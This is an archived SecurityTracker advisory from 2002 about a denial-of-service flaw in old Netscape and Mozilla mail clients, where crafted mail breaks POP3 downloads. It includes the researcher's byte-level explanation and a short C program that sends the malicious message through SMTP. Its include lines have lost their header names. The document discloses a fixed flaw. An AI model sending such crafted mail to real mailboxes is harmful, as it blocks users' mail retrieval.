SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (E-mail Client)  >   Netscape Communicator Vendors:   America Online, Inc.
Netscape Communicator Mail Download Can Be Crashed By Remote Users Sending Malicious E-mail via POP3
SecurityTracker Alert ID:  1004571
SecurityTracker URL:  http://securitytracker.com/id/1004571
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 18 2002
Impact:   Denial of service via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 4.77 and prior versions
Description:   A vulnerability was reported in the e-mail component of older versions of Netscape Communicator. A remote user could send a specially crafted e-mail message that will cause the Netscape e-mail client to fail to download messages when downloading the message from a POP3 server.

It is reported that the specially crafted e-mail message can cause the mail client to desynchronize with the POP3 server, effectively stopping the download in progress.

A mail message that has a single dot ('.') at a new line followed with text on the following line will reportedly trigger the flaw. The client will incorrectly interpret the single dot as the end of the mail message and will attempt to download the next message (even thought the message isn't finished). This will likley cause the client to disconnect from the server.

Impact:   A remote user can send a message that will cause the client to stop downloading messages.
Solution:   The vendor fixed the issue in version 4.79.
Vendor URL:  browsers.netscape.com/browsers/main.tmpl (Links to External Site)
Cause:   Exception handling error, Input validation error
Underlying OS:  Linux (Any), Apple (Legacy "classic" Mac), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Another small DoS on Mozilla <= 1.0 through pop3


////////////////////////////////////////////
///// Strange Software Behaviour Report
///
//// discovered, understood and exploited between 05, 08 2001
//// (yes, i took the time... :) )
///  eldre8
Wed Jun 12 20:47:59 CEST 2002

\/\/\_/-> System affected:
        Netscape v =<4.77
        Mozilla <1.1

^\/\/'\-> System not affected:
        Outlook Express 4.72.3110.5
        maybe the other versions of Outlook

|_/\/\\/> Buggy software team contacted about this:
        Yes, the bug is fixed now.

/\/\/\_/> Exploitation: remote & very easy & very anonymous :(

_/\/\/\_> Effects: With this remote hole, we can block any mail
        box that is checked with a pop3 client, so the
        hotmail, yahoo like servers are not affected.
        A mail will cause the pop3 client to desynchronize
        with the server, losing the connection to it, and
        so, leaves all messages on the server (explain later)...

-/\/\/\/> Explanation: In the SMTP protocol, we can send mail with
        some introduction command (ehlo,mail,rcpt) and then
        type our messages and place a dot at a new line to
        specify to the MTA that it is the end of the message.
        On the other side, when a POP3 client check mail, it
        connect to the server, retreive the mail, it terminate
        the download of a message when it sees a dot at a new line.
        And here is the trick.
        If we can place a dot at a new line, and place other
        words below this dot, the client will beleive the mail
        is finished and will try to download next messages, thus
        beiing desynchronize with the server...
        The POP3 client act as:
            login on to the POP3 server
            retrieve mails
            delete mails
            logout
        but if it is desynchronize, it will retreive mail, and
        disconnect, thus didn't delete mails, and the next time
        it login, it will refind the same mail, will retreive one
        more time the mails, disconnect, and other and other...
        A more detailed explanation,
        here it is a simple end of a normal mail:
            blabla...
            \x0a
            \x0a
        and this is the bad mail:
            blabla...
            \x0a\x0d\x2e\x0d\x20\x0a\x0a\x0a
            blabla...
            \x0a\x20\x00
            \x0a
        We can see at the end of the two 0x0a, it seems that it is just
        place here by the console...forget it.
        At this stage, you could catch the bug...

=\/\/\/-> Possible fixes: There are different ways to fix this,
        - one way is from the client, to stop the bad mail,
            this is to connect manually via telnet to the pop3
            server, and then identify the bad message and do a
            dele <# of the message>
        - one better way is to fix this from the client itself,
            the client can get the size of each messages via
            the list command, so it should be able to retrieve
            the complete message, not less, not more...
        - one way is to fix the MTA so it will not accept such
            the code below...

~\/\/\/~> (buggy:])Exploit:

/* this is the code that comes with my
 * advisory #1 to illustrate this...
 * eldre8 at afturgurluk (double dot minus one) org
 */

#include
#include
#include
#include
#include
#include
#include
#include

#define MX "localhost"
#define EHLO "EHLO mx\r\n"
#define MAIL "MAIL FROM: root@localhost\r\n"
#define RCPT "RCPT TO: root@localhost\r\n"
#define DATA "DATA\r\n"
#define QUIT "QUIT\r\n"

#define PORT 25

int sock;
char buffer[255];

void SigCatch() {
    fprintf(stderr, "\b\bbye!\n");
    close(sock);
    exit(0);
}

int main() {
    /* I was too lame to implement the command line... :) */
    int i;
    struct sockaddr_in sout;
    struct hostent *hp;

    signal(SIGINT, SigCatch);

    hp=gethostbyname(MX);
    sock=socket(AF_INET, SOCK_STREAM, 0);
    if (sock<0) {
        perror("sock");
        return -1;
    }

    sout.sin_family=AF_INET;
    sout.sin_port=htons(PORT);
    memcpy(&(sout.sin_addr), *(hp->h_addr_list), sizeof(struct in_addr));
    if (connect(sock, &sout, sizeof(sout))<0) {
        perror("connect");
        return -1;
    }
    recv(sock, buffer, 255, 0); /* receive the banner... */
    send(sock, EHLO, sizeof(EHLO), 0);
    recv(sock, buffer, 255, 0); /* receive the welcome message... */
    send(sock, MAIL, sizeof(MAIL), 0);
    recv(sock, buffer, 255, 0); /* receive the acknowledgement to mail from. */
    send(sock, RCPT, sizeof(RCPT), 0);
    recv(sock, buffer, 255, 0); /* idem, but for the rcpt to... */
    send(sock, DATA, sizeof(DATA), 0);
    recv(sock, buffer, 255, 0);
    i=sprintf(buffer, "b4d maIl 1n 4KT1oN!\n\x0a\x0d\x2e\x0d\x20\x0a\x0a\nblabla...\x0a\x20");
    *(buffer+i)="\x0";
    sprintf(buffer+i+1, "\n.\n");
    send(sock, buffer, i+1+3, 0); /* send the dumb thing ... */
    recv(sock, buffer, 255, 0);
    send(sock, QUIT, sizeof(QUIT), 0);
    recv(sock, buffer, 255, 0);
    close(sock);

    return 0;
}

=_-/\/`-> Greetz/Shouts:
    all who know me, and all that I forget here because of anonymity reason...
    especially french speaking boys & girls! ;)
    And special to anyone in search of knowledge and those who distribute
    knowledge.

You can find this report on: afturgurluk.org/~eldre8/files/pop3client_dos.txt

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC